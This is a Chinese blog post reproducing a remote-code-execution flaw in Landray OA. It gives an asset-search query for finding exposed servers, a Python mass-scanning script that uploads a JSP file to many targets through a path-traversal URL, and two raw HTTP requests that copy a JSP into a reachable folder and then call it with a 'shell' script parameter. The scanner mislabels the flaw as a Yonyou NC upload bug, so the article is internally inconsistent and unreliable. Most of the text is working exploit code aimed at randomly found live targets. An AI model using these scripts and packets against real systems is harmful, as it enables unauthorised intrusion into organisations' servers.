devbox
运维做开发
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

【漏洞复现】某凌OA 文件Copy导致远程代码执行_蓝凌oa漏洞

作者:运维做开发 | 2024-08-18 22:34:32

蓝凌oa漏洞

     声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

蓝凌OA平台正通过加速构建产业互联网来深化其数字化发展,从而对企业的协作能力提出了更高的要求。为了支持这一转变,蓝凌推出了新一代生态型OA平台,旨在促进大中型组织的内外协作与管理,支撑办公自动化、管理智能化、应用平台化和组织生态化。然而,由于蓝凌OA平台的某些代码功能模块存在设计缺陷,攻击者可能会利用这些漏洞进行未授权操作,对系统安全构成威胁。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:app.name="Landray 蓝凌OA"

2.使用poc批量扫描

  1. import requests
  2. import random
  3. import string
  4. import argparse
  5. from urllib3.exceptions import InsecureRequestWarning
  6.  
  7. # 设置颜色代码用于控制台输出
  8. RED = '\033[91m'
  9. RESET = '\033[0m'
  10.  
  11. # 忽略不安全的SSL警告
  12. requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
  13.  
  14. # 随机生成字符串函数,长度为n
  15. def rand_base(n):
  16.     return ''.join(random.choices(string.ascii_lowercase + string.digits, k=n))
  17.  
  18. # 检查目标URL是否具有特定的RCE(远程代码执行)漏洞
  19. def check_vulnerability(url):
  20.     filename = rand_base(6)  # 生成随机文件名
  21.     upload_url = url.rstrip('/') + '/mp/initcfg/%2e%2e/uploadControl/uploadFile'  # 构造上传URL
  22.     upload_headers = {
  23.         # 构造上传请求头
  24.         'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
  25.         'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarygcflwtei',
  26.         'Connection': 'close'
  27.     }
  28.     # 构造上传数据体
  29.     upload_data = (
  30.         '------WebKitFormBoundarygcflwtei\r\n'
  31.         f'Content-Disposition: form-data; name="file"; filename="{filename}.jsp"\r\n'
  32.         'Content-Type: image/jpeg\r\n\r\n'
  33.         '<% out.println("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n'
  34.         '------WebKitFormBoundarygcflwtei\r\n'
  35.         'Content-Disposition: form-data; name="submit"\r\n\r\n'
  36.         '上传\r\n'
  37.         '------WebKitFormBoundarygcflwtei--'
  38.     ).encode('utf-8')
  39.  
  40.     try:
  41.         # 发送上传请求
  42.         response_upload = requests.post(upload_url, headers=upload_headers, data=upload_data, verify=False, timeout=30)
  43.         # 构造访问上传文件的URL
  44.         access_url = url.rstrip('/') + f'/mp/uploadFileDir/{filename}.jsp'
  45.         access_headers = {
  46.             # 访问请求头
  47.             'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
  48.         }
  49.         # 发送访问请求
  50.         response_access = requests.get(access_url, headers=access_headers, verify=False, timeout=30)
  51.         
  52.         # 检查响应状态和内容以判断是否存在漏洞
  53.         if response_upload.status_code == 200 and response_access.status_code == 200 and "HelloWorldTest" in response_access.text:
  54.             print(f"{RED}URL [{url}] 存在用友 NC uploadControluploadFile 文件上传致RCE漏洞{RESET}")
  55.         else:
  56.             print(f"URL [{url}] 不存在漏洞")
  57.     except requests.exceptions.Timeout:
  58.         print(f"URL [{url}] 请求超时,可能存在漏洞")
  59.     except requests.RequestException as e:
  60.         print(f"URL [{url}] 请求失败: {e}")
  61.  
  62. # 主函数,解析命令行参数并调用检查函数
  63. def main():
  64.     parser = argparse.ArgumentParser(description='检测目标地址是否存在用友 NC uploadControluploadFile 文件上传致RCE漏洞')
  65.     parser.add_argument('-u', '--url', help='指定目标地址')
  66.     parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
  67.  
  68.     args = parser.parse_args()
  69.  
  70.     # 如果提供了单个URL,则检查该URL
  71.     if args.url:
  72.         if not args.url.startswith("http://") and not args.url.startswith("https://"):
  73.             args.url = "http://" + args.url
  74.         check_vulnerability(args.url)
  75.     # 如果提供了包含URL的文件,则遍历文件中的每个URL进行检查
  76.     elif args.file:
  77.         with open(args.file, 'r') as file:
  78.             urls = file.read().splitlines()
  79.             for url in urls:
  80.                 if not url.startswith("http://") and not url.startswith("https://"):
  81.                     url = "http://" + url
  82.                 check_vulnerability(url)
  83.  
  84. if __name__ == '__main__':
  85.     main()

cmd运行:python poc.py -f url.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

构造数据包:

  1. POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
  2. Host: ip
  3. Accept:application/json,text/javascript,*/*;q=0.01
  4. Accept-Encoding:gzip,deflate
  5. Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
  6. Connection:close
  7. Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
  8. User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
  9. X-Requested-With:XMLHttpRequest
  10. Content-Length: 395
  11.  
  12. ------WebKitFormBoundaryL7ILSpOdIhIIvL51
  13. Content-Disposition:form-data;name="method"
  14.  
  15. replaceExtend
  16. ------WebKitFormBoundaryL7ILSpOdIhIIvL51
  17. Content-Disposition:form-data;name="extendId"
  18.  
  19. ../../../../resource/help/km/review/
  20. ------WebKitFormBoundaryL7ILSpOdIhIIvL51
  21. Content-Disposition:form-data;name="folderName"
  22.  
  23. ../../../ekp/sys/common
  24. ------WebKitFormBoundaryL7ILSpOdIhIIvL51--

上传数据包:

  1. POST /resource/help/km/review/dataxml.jsp HTTP/1.1
  2. Host: ip
  3. User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36
  4. Connection:close
  5. Content-Length:17392
  6. Content-Type:application/x-www-form-urlencoded
  7.  
  8. s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test

2.数据包分析 

构造数据包:

这是一个HTTP POST请求的数据包,用于向服务器发送数据。以下是对该数据包的解析:

  1. 请求行:POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1,表示这是一个POST请求,目标URL为/sys/ui/sys_ui_component/sysUiComponent.do,使用的HTTP协议版本为1.1。

  2. 请求头:包含了一些关于请求的信息,如主机名、接受的内容类型、编码方式、语言、连接状态等。

    • Host: ip,表示请求的目标服务器的IP地址。
    • Accept: application/json,text/javascript,/;q=0.01,表示客户端可以接受的内容类型及其优先级。
    • Accept-Encoding: gzip,deflate,表示客户端可以接受的压缩格式。
    • Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,表示客户端的首选语言及其优先级。
    • Connection: close,表示请求完成后关闭连接。
    • Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51,表示请求体的类型和分隔符。
    • User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36,表示客户端的浏览器信息。
    • X-Requested-With: XMLHttpRequest,表示请求是由XMLHttpRequest发起的。
    • Content-Length: 395,表示请求体的长度为395字节。

  3. 请求体:包含了实际要发送给服务器的数据。这里使用了multipart/form-data格式,通过分隔符(boundary)来区分不同的表单字段。具体包含以下三个部分:

    • method: replaceExtend,表示请求的方法是replaceExtend。
    • extendId: ../../../../resource/help/km/review/,表示扩展ID的值。
    • folderName: ../../../ekp/sys/common,表示文件夹名称的值。

上传数据包:

这是一个HTTP POST请求的数据包,用于向服务器发送数据。以下是对该数据包的解析:

1. 请求行:`POST /resource/help/km/review/dataxml.jsp HTTP/1.1`,表示这是一个POST请求,目标URL为`/resource/help/km/review/dataxml.jsp`,使用的HTTP协议版本为1.1。

2. 请求头:包含了一些关于请求的信息,如主机名、用户代理、连接状态等。

   - Host: ip,表示请求的目标服务器的IP地址。
   - User-Agent: Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36,表示客户端的浏览器信息。
   - Connection: close,表示请求完成后关闭连接。
   - Content-Length: 17392,表示请求体的长度为17392字节。
   - Content-Type: application/x-www-form-urlencoded,表示请求体的类型是表单数据。

3. 请求体:包含了实际要发送给服务器的数据。这里使用了application/x-www-form-urlencoded格式,将参数以键值对的形式进行编码。具体包含以下四个参数:

   - s_bean=ruleFormulaValidate,表示参数名为s_bean,值为ruleFormulaValidate。
   - script=shell,表示参数名为script,值为shell。
   - returnType=int,表示参数名为returnType,值为int。
   - modelName=test,表示参数名为modelName,值为test。

3.结束跑路

使用yakit Web Fuzzer构造数据包发送。

使用yakit Web Fuzzer上传数据

每篇一言:信心这个东西,什么时候都像个高楼大厦,但是里面会长白蚁。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/运维做开发/article/detail/999486
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号